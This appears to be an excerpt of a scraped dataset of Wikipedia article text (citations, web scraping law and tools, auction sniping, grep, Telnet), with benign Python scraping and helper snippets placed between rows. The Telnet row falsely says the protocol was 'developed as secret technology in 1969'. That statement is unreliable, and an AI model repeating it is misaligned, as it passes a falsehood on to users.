citation in a reference section near the bottom of the article. While editing a page that uses the most common footnote style, you will see inline citations displayed between ref ... ref tags. If you are creating a new page, or adding references to a page that didn't previously have any, remember to add a References section like the one below near the end of the article: Note: This is by far the most popular system for inline citations, but sometimes you will find other styles being used in an article. This is acceptable, and you shouldn't change it or mix styles. To add a new reference, just copy and modify an existing one. Manually adding references can be a slow and tricky process. Fortunately, there is a tool called "RefToolbar" built into the Wikipedia edit window, which makes it much easier. To use it, click on Cite at the top of the edit window, having already positioned your cursor after the sentence or fact you wish to reference. Then select one of the 'Templates' from the dropdown menu that best suits the type of source. These are: A template window then pops up, where you fill in as much information as possible about the source, and give a unique name for it in the "Ref name" field. Click the "Insert" button, which will add the required wikitext in the edit window. If you wish, you can also "Preview" how your reference will look first. Some fields (such as a web address, also known as a URL) will have a icon next to them. After filling in this field, you can click it to handily autofill the remaining fields. It doesn't always work properly, though, so be sure to double check it. Often, you will want to use the same source more than once in an article to support multiple facts. In this case, you can click Named references in the toolbar, and select a previously added source to re-use. As an alternative to the RefToolbar, it is possible to insert citations in the source editor using a similar automated tool as the one used in the visual editor. 
For this, you need to enable the 2017 wikitext editor in your preferences. You will then be able to edit the source of pages while inserting citations using the automated tool of the visual editor. Wikipedia articles require reliable, published sources that directly support the information presented in the article. Now you know how to add sources to an article, but which sources should you use? The word "source" in Wikipedia has three meanings: the work itself (for example, a document, article, paper, or book), the creator of the work (for example, the writer), and the publisher of the work (for example, Cambridge University Press). All three can affect reliability. Reliable sources are those with a reputation for fact-checking and accuracy. They tend to have an editorial process with multiple people scrutinizing work before it is published. Academic and peer-reviewed publications are usually the most reliable sources. Other reliable sources include university textbooks, books published by respected publishing houses, magazines, journals, and news coverage (not opinions) from mainstream newspapers. Self-published media, where the author and publisher are the same, are usually not acceptable as sources. These can include newsletters, personal websites, press releases, patents, open wikis, personal or group blogs, and tweets. However, if an author is an established expert with a previous record of third-party publications on a topic, their self-published work may be considered reliable for that particular topic. Whether a source is usable also depends on context. Sources that are reliable for some material are not reliable for other material. For instance, otherwise unreliable self-published sources are usually acceptable to support uncontroversial information about the source's author. You should always try to use the best possible source, particularly when writing about living people. These are general guidelines, but the topic of reliable sources is a complicated one, and is impossible to fully cover here. You can find more information at Wikipedia:Verifiability and at Wikipedia:Reliable sources. There is also a list of commonly used sources with information on their reliability. Try it Take a quiz on reliable sources |
185 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:WhatLinksHere/Data_scraping | The following pages link to Data scraping Showing 50 items. |
186 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-8 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
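The fetch-then-extract cycle this row describes maps directly onto the libraries already imported at the top of this notebook (requests, BeautifulSoup, pandas). The sketch below is a minimal, hypothetical illustration: the URL is a placeholder and the choice of anchor tags as the extraction target is an assumption.
# Minimal fetch-and-extract sketch: fetch one page, parse it, pull out link
# text and resolved URLs, and collect the results in a DataFrame (the
# "spreadsheet" step described above). The URL is a placeholder.
import requests
import pandas as pd
from bs4 import BeautifulSoup
from urllib.parse import urljoin

url = "https://example.com"                       # placeholder target page
resp = requests.get(url, timeout=10)              # fetching: download the page
resp.raise_for_status()

soup = BeautifulSoup(resp.text, "html5lib")       # parsing the fetched HTML
rows = [{"text": a.get_text(strip=True), "href": urljoin(url, a["href"])}
        for a in soup.find_all("a", href=True)]   # extraction: anchors and resolved links
print(pd.DataFrame(rows).head())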
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
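The regular-expression approach mentioned in this row can be sketched with Python's re module, which this notebook already imports. The HTML snippet and the deliberately simple pattern below are assumptions for illustration; real pages are usually better handled with an HTML parser such as BeautifulSoup.
# Minimal regex-extraction sketch: pull e-mail addresses out of a raw HTML string.
# The snippet and pattern are illustrative only.
import re

html = '<p>Contact: <a href="mailto:sales@example.com">sales@example.com</a></p>'
email_pattern = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
print(email_pattern.findall(html))   # finds the address twice (href and link text)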
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
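One of the measures commonly listed here is publishing a robots.txt policy, which cooperative scrapers are expected to honor. As a rough sketch in this notebook's Python, using only the standard library (the target URL and the two-second delay are illustrative assumptions):

import time
import urllib.robotparser
from urllib.parse import urlparse

def polite_fetch_allowed(url, user_agent="*"):
    # Ask the site's robots.txt whether this user agent may fetch the URL.
    parts = urlparse(url)
    rp = urllib.robotparser.RobotFileParser()
    rp.set_url(f"{parts.scheme}://{parts.netloc}/robots.txt")
    rp.read()
    return rp.can_fetch(user_agent, url)

# Illustrative usage: check permission, then pause between requests
# so the crawl does not overload the server.
target = "https://en.wikipedia.org/wiki/Web_scraping"  # example URL
if polite_fetch_allowed(target):
    time.sleep(2)  # simple fixed crawl delay (assumed value)
    # page = requests.get(target)  # requests is imported earlier in this notebook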
187 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Auction_sniping | Auction sniping (also called bid sniping) is the practice, in a timed online auction, of placing a bid likely to exceed the current highest bid (which may be hidden) as late as possible—usually seconds before the end of the auction—giving other bidders no time to outbid the sniper. This can be done either manually or by software on the bidder's computer, 1 or by an online sniping service. 2 3 A bid sniper (often, merely called a sniper) is a person, or software agent, that performs auction sniping. Online services claim that their use decreases the failure rate of the snipe, because they have more reliable servers and a faster Internet connection with less variation in latency, allowing the bid to more reliably be placed close to the deadline. Experienced bidders on online auctions with fixed ending-times often prefer entering bids late in the auction 4 to avoid bidding wars (multiple rounds of bidders each increasing their maximum bid to temporarily regain "current highest bid" status) 2 or bid chasing (where the presence of an existing bid encourages others to bid on the same item). One economic analysis of sniping suggests that sniping is a rational gain-maximizing (in other words, price-minimizing) strategy for bidders in auctions that fulfill two criteria: For example, a novice antiques buyer may prefer to bid in auctions which already have bids placed by more experienced antiques buyers, on the grounds that the items which the experienced buyers are interested in are more likely to be valuable. In this case, more-informed buyers may delay bidding until the last minutes of the auction to avoid creating competition for their bids, leading to a lower winning bid. An analysis of actual winning bids on eBay suggests that winning bidders are more likely to have placed a single bid late in the auction, rather than to have placed multiple incremental bids as the auction progresses. 6 Many online auctions use proxy bidding, an iterative sealed bid auction where winners pay a fixed increment over the second highest bid. The auctioneer does not disclose the current maximum bid, but the second highest bid is always public. In proxy bidding, the wise bidder must know in advance the "true" value of an item as a basis for their secret bidding limit. 2 The fact that the maximum bid is revealed when it is outbid introduces the possibility of maximum bid fishing. Bidders unsure of the value of an item may incrementally increase their bid until they narrowly exceed the previously hidden maximum, thus placing themselves in a winning position without placing a very high bid. Sniping eliminates this possibility and effectively converts the auction to a Vickrey auction, the same as a proxy bidding auction except that all bids are kept secret until the close of bidding. Sniping closes a loophole to fraudulent practice by a shill (an agent for the seller, which may be another account of the seller) to raise the bid to the maximum. They then hope the original bidder will increase their maximum bid even by a small amount to win the auction. The danger to the seller in this case is that the original bidder may not choose to increase their bid, leaving the seller with a futile transaction (selling the item to themselves) which will often still incur a fee from the auction service. 
Bidding at the last moment prevents a shill bidder from pushing the auction higher, as they have no time to make the incremental bids required. Bid sniping can be used when many similar items are available at auction simultaneously, with various ending times, and a bidder only wishes to win one item. Automated bid sniping tools allow for an efficient way to bid on multiple items, up to the maximum price the bidder wishes to pay, without bidding on the actual auction platform itself and potentially winning more than one of the auctions. Once the bidder wins the desired item, they can cancel the other scheduled snipe bids before they are actually placed in the auction system itself. This is not a factor if the auction platform allows bidders to instantly withdraw their bids without reason, but many do not. Increasing the number of similar or identical items bid on, reduces the attachment to winning any one of them. The ability to batch a queue of snipe bids for auctions long in advance and waiting for notification of the win without further management allows for a more efficient use of time. Non-sniping bidders may object to sniping, claiming that it is unfair to place bids at a point when it is impossible or unfeasible for other bidders to evaluate and possibly counter the bid, causing them to lose auctions even though they would have been willing to meet the winning bid amount. Bidders sometimes object to sniping when multiple identical items are listed as a separate lot, or on breakup auctions, where items that constitute a set are broken down and sold separately, as they must wait to find whether their maximum bid on one lot has been exceeded before being in a position to decide whether to bid on another. citation needed However, online auction sites, unlike live auctions, usually have an automatic bidding system which allows a bidder to enter their maximum acceptable bid. This is a hidden or proxy bid, known to the system, but not any other bidders; during the auction the actual bid is incremented only enough to beat the existing highest bid. For example, if an item's current maximum high bid is 57 and someone is prepared to pay 100 and bids accordingly, the displayed bid will be 58, with the hidden maximum of 100. 7 The failure of a maximum acceptable bid beaten by a sniper prepared to pay more is not due to the act of sniping, unless the original bidder would have bid higher on seeing their bid exceeded. For this reason, opposition to sniping can be analyzed as more of a subjective reaction to losing an auction for the usual reason of not bidding enough, than a reaction to a "dirty trick". 8 The beaten bidder would have beaten the sniper if their maximum bid had been more than the sniper was willing to offer. However, if the minimum bid increment is very low, the sorites paradox can come into play, and make it difficult for a person to establish a single maximum bid. 9 For example, if the minimum bid increment on an auction is 10 cents, it can be difficult or impossible for a person to identify a price which they would be willing to pay to win the item but which they would not be willing to exceed by ten cents. original research? While some people disapprove of auction sniping, it is not forbidden by the rules of many auction sites. For example, it is permitted by eBay. eBay Germany banned automated sniping services in 2002, 10 but the ban was declared illegal by Berlin's County Court, and revoked. 
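The proxy-bidding arithmetic described above (a hidden maximum, with the displayed price advancing only one increment past the beaten bid) can be sketched as follows; the single fixed increment and the absence of reserve or tie handling are simplifying assumptions, not any specific site's rules:

def displayed_bid(current_high, new_max, increment=1):
    # Proxy bidding: the new bidder's hidden maximum wins if it exceeds
    # the current high bid; the displayed price is only one increment
    # above the amount needed to beat the previous leader.
    if new_max <= current_high:
        return current_high, False  # new bidder is immediately outbid
    shown = min(new_max, current_high + increment)
    return shown, True

# Reproducing the example from the text: current high bid 57,
# a new bidder willing to pay up to 100 -> displayed bid 58.
print(displayed_bid(57, 100))  # (58, True)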
11 One attempt to defeat automated bid sniping software is requiring bidders to pass a CAPTCHA test prior to entering their bid. This ensures that all bids are entered manually. Some software can read some CAPTCHAs, potentially neutralising the protection. Also known simply as "anti-snipe". Some online auction systems attempt to discourage sniping (manual or automated) by automatically extending the auction time if a last-minute bid is placed. This approach leaves all bidding open, and allows any bidders who are watching during the final few minutes to raise the bid. It can also lead to last-minute automated out-of-control bidding wars between bidders, which can extend the bidding time long beyond what the seller desired, greatly raising the final selling price. Any site which implements a limit to the number of time extensions allowed simply causes a final extension snipe. Some auction systems allow buyers to end an auction early by paying a predetermined final price for the item (generally substantially more than the minimum opening bid). This may discourage some sniping because another bidder can simply purchase the item outright while the sniper is waiting for the auction end time, even if a successful snipe bid could win it for substantially less than the Buy It Now price. On eBay the Buy It Now (BIN) option is not intended to deter sniping, and is removed as soon as a bid (exceeding a reserve price, if set) is made. A bidder intending to snipe can eliminate the Buy It Now option by making the lowest acceptable bid early in the auction. The practice of buying newly listed Buy It Now items offered at an attractively low price is sometimes called "BIN sniping", 12 though unrelated to last-minute sniping. BIN sniping cannot be automated; the sniper must check items as soon they are listed, and buy before anyone else. |
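The auto-extension countermeasure mentioned above boils down to pushing the closing time back whenever a bid arrives inside a final window; a minimal sketch, where the five-minute window and extension are assumed values rather than any particular site's policy:

from datetime import datetime, timedelta

def maybe_extend(end_time, bid_time, window=timedelta(minutes=5),
                 extension=timedelta(minutes=5)):
    # If a bid arrives inside the closing window, move the end time back
    # so other bidders have a chance to respond to the late bid.
    if end_time - bid_time <= window:
        return bid_time + extension
    return end_time

end = datetime(2024, 1, 1, 12, 0, 0)
late_bid = datetime(2024, 1, 1, 11, 58, 30)
print(maybe_extend(end, late_bid))  # auction now ends at 12:03:30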
188 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Grep | grep is a command-line utility for searching plaintext datasets for lines that match a regular expression. Its name comes from the ed command g/re/p (global regular expression search and print), which has the same effect. 3 4 grep was originally developed for the Unix operating system, but later became available for all Unix-like systems and some others such as OS-9. 5 Before it was named, grep was a private utility written by Ken Thompson to search files for certain patterns. Doug McIlroy, unaware of its existence, asked Thompson to write such a program. Responding that he would think about such a utility overnight, Thompson actually corrected bugs and made improvements for about an hour on his own program called s (short for "search"). The next day he presented the program to McIlroy, who said it was exactly what he wanted. Thompson's account may explain the belief that grep was written overnight. 6 Thompson wrote the first version in PDP-11 assembly language to help Lee E. McMahon analyze the text of The Federalist Papers to determine authorship of the individual papers. 7 The ed text editor (also authored by Thompson) had regular expression support but could not be used to search through such a large amount of text, as it loaded the entire file into memory to enable random access editing, so Thompson excerpted that regexp code into a standalone tool which would instead process arbitrarily long files sequentially without buffering too much into memory. 1 He chose the name because in ed, the command g/re/p would print all lines featuring a specified pattern match. 8 9 grep was first included in Version 4 Unix. Stating that it is "generally cited as the prototypical software tool", McIlroy credited grep with "irrevocably ingraining" Thompson's tools philosophy in Unix. 10 A variety of grep implementations are available in many operating systems and software development environments. 11 Early variants included egrep and fgrep, introduced in Version 7 Unix. 10 The "egrep" variant supports an extended regular expression syntax added by Alfred Aho after Ken Thompson's original regular expression implementation. 12 The "fgrep" variant searches for any of a list of fixed strings using the Aho-Corasick string-matching algorithm. 13 Binaries of these variants exist in modern systems, usually linking to grep or calling grep as a shell script with the appropriate flag added, e.g. exec grep -E. egrep and fgrep, while so commonly deployed on POSIX systems that the POSIX specification mentions their widespread existence, are not actually part of POSIX. 14 Other commands contain the word "grep" to indicate they are search tools, typically ones that rely on regular expression matches. The pgrep utility, for instance, displays the processes whose names match a given regular expression. 15 In the Perl programming language, grep is the name of the built-in function that finds elements in a list that satisfy a certain property. 16 This higher-order function is typically named filter or where in other languages. The pcregrep command is an implementation of grep that uses Perl regular expression syntax. 17 Similar functionality can be invoked in the GNU version of grep with the -P flag. 18 Ports of grep (within Cygwin and GnuWin32, for example) also run under Microsoft Windows. Some versions of Windows feature the similar qgrep or findstr command. 
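grep's core behaviour, printing the input lines that match a regular expression, maps directly onto Python's re module, and the list-filtering sense used by Perl's grep corresponds to Python's filter; the function below is a rough illustration, not a replacement for the real utility:

import re

def grep(pattern, lines, ignore_case=False):
    # Return the lines that contain a match for the regular expression,
    # similar in spirit to `grep pattern file`.
    flags = re.IGNORECASE if ignore_case else 0
    regex = re.compile(pattern, flags)
    return [line for line in lines if regex.search(line)]

sample = ["error: disk full", "ok: backup done", "ERROR: timeout"]
print(grep(r"error", sample, ignore_case=True))
# ['error: disk full', 'ERROR: timeout']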
19 A grep command is also part of ASCII's MSX-DOS2 Tools for MSX-DOS version 2. 20 The grep, egrep, and fgrep commands have also been ported to the IBM i operating system. 21 The software Adobe InDesign has functions GREP (since CS3 version (2007) 22 ), in the find change dialog box 23 "GREP" tab, and introduced with InDesign CS4 24 in paragraph styles 25 "GREP styles". agrep (approximate grep) matches even when the text only approximately fits the search pattern. 26 This following invocation finds netmasks in file myfile, but also any other word that can be derived from it, given no more than two substitutions. This example generates a list of matches with the closest, that is those with the fewest, substitutions listed first. The command flag B means best: In December 2003, the Oxford English Dictionary Online added "grep" as both a noun and a verb. 27 A common verb usage is the phrase "You can't grep dead trees"—meaning one can more easily search through digital media, using tools such as grep, than one could with a hard copy (i.e. one made from "dead trees", which in this context is a dysphemism for paper). 28 |
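agrep's approximate matching can be imitated with a similarity check; the sketch below uses difflib from the standard library, so the similarity cutoff only loosely stands in for agrep's "at most k substitutions" rule and should be read as an assumption:

import difflib

def approx_matches(word, candidates, cutoff=0.75):
    # Return candidate words that are "close enough" to the search word.
    # difflib's ratio is a similarity score, not an edit-distance bound,
    # so this only approximates agrep's behaviour.
    return [c for c in candidates
            if difflib.SequenceMatcher(None, word, c).ratio() >= cutoff]

words = ["netmask", "netmasks", "netmark", "network", "basket"]
print(approx_matches("netmask", words))
# ['netmask', 'netmasks', 'netmark']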
189 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Telnet | Telnet (short for "teletype network") 1 2 is a client server application protocol that provides access to virtual terminals of remote systems on local area networks or the Internet. 3 It is a protocol for bidirectional 8 bit communications. Its main goal was to connect terminal devices and terminal-oriented processes. 4 Telnet consists of two components: (1) the protocol itself which specifies how two parties are to communicate and (2) the software application that provides the service. User data is interspersed in-band with Telnet control information in an 8 bit byte oriented data connection over the Transmission Control Protocol (TCP). Telnet was developed as secret technology in 1969 beginning with RFC 15, extended in RFC 855, and standardized as Internet Engineering Task Force (IETF) Internet Standard STD 8, one of the first Internet standards. 1 2 Telnet transmits all information including usernames and passwords in plaintext so it is not recommended for security-sensitive applications such as remote management of routers. 3 5 Telnet's use for this purpose has waned significantly in favor of SSH. 6 Some extensions to Telnet which would provide encryption have been proposed. 7 Telnet consists of two components: (1) the protocol itself and (2) the service component. The telnet protocol is a client-server protocol, based on a reliable connection-oriented transport. 3 This protocol is used to establish a connection to Transmission Control Protocol (TCP) port number 23 or 2323, where a Telnet server application is listening. 4 8 9 The Telnet protocol abstracts any terminal as a Network Virtual Terminal (NVT). The client must simulate a NVT using the NVT codes when messaging the server. Telnet predated UDP IP and originally ran over Network Control Protocol (NCP). 10 The telnet service is best understood in the context of a user with a simple terminal using the local Telnet program (known as the client program) to run a logon session on a remote computer where the user's communications needs are handled by a Telnet server program. Even though Telnet was an ad hoc protocol with no official definition until March 5, 1973, 11 the name actually referred to Teletype Over Network Protocol as the RFC 206 (NIC 7176) on Telnet makes the connection clear: 12 The TELNET protocol is based upon the notion of a virtual teletype, employing a 7 bit ASCII character set. The primary function of a User TELNET, then, is to provide the means by which its users can 'hit' all the keys on that virtual teletype. 13 Essentially, it used an 8 bit channel to exchange 7 bit ASCII data. Any byte with the high bit set was a special Telnet character. On March 5, 1973, a Telnet protocol standard was defined at UCLA 14 with the publication of two NIC documents: Telnet Protocol Specification, NIC 15372, and Telnet Option Specifications, NIC 15373. Many extensions were made for Telnet because of its negotiable options protocol architecture. Some of these extensions have been adopted as Internet standards, IETF documents STD 27 through STD 32. Some extensions have been widely implemented and others are proposed standards on the IETF standards track (see below). The Telnet service is the application providing services over the Telnet protocol. Most operating systems provide a service that can be installed or enabled to provide Telnet services to clients. 
